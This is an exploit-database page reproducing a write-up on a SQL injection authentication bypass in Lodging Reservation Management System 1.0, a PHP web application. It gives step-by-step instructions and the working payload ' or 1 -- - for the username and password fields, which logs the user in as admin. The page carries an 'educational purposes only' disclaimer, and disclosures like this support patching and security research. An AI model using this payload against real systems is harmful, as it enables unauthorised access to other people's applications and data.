Lodging reservation management system 1.0 authentication bypass Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-10-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Lodging reservation management system 1.0 authentication bypass is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass
# Date: 2021-09-20
# Exploit Author: Nitin Sharma(vidvansh)
# Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code
# Version: v1.0
# Tested on: Windows 10 - XAMPP Server
# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
#Steps-To-Reproduce:
Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php.
Step 2 – Enter anything in username and password
Step 3 – Click on Login and capture the request in the burp suite
Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
Step 5 – Click forward and now you will be logged in as admin.
# Go to admin login page (http://localhost/lodge/admin/login.php), then use below payload as username and password =>
Username: ' or 1 -- -
Password: ' or 1 -- -
Lodging reservation management system 1.0 authentication bypass